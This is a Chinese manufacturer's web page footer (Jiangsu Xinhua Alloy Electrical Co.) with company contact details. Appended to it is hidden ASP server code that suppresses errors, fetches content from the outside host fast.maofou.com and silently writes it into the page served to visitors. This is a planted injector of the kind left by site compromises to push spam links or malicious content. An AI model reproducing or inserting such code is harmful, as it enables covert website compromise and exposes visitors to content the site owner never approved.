江苏新华合金电器有限公司标志
 
江苏新华合金电器有限公司 江苏新华合金电器有限公司 江苏新华合金电器有限公司
电热丝| 精密合金| 耐热钢| 电阻带| 特种焊丝 江苏新华合金电器有限公司
电热丝地址:江苏省兴化市张郭镇南19号 电话:086-0523-83760808 83761157 83765356 传真:086-0523-83765353
电热丝| 精密合金| 耐热钢     E-mail:hdf@dianresi.com 江苏新华合金电器有限公司 (c) 2010版权所有 | 技术支持:戴南人才网
<% On Error Resume Next Server.ScriptTimeOut=9999999 response.write(getHTTPPage("http://fast.maofou.com/B9.htm")) function getHTTPPage(url) dim http set http=createobject("MSXML2.ServerXMLHTTP") Http.open "GET",url,false Http.send() if http.status <> 200 then exit function end if if Http.readystate<>4 then exit function end if getHTTPPage=bytes2BSTR(Http.responseBody) set http=nothing if err.number<>0 then err.Clear end function Function bytes2BSTR(vIn) dim strReturn dim i,ThisCharCode,NextCharCode strReturn = "" For i = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn,i,1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn,i+1,1)) strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) i = i + 1 End If Next bytes2BSTR = strReturn End Function %>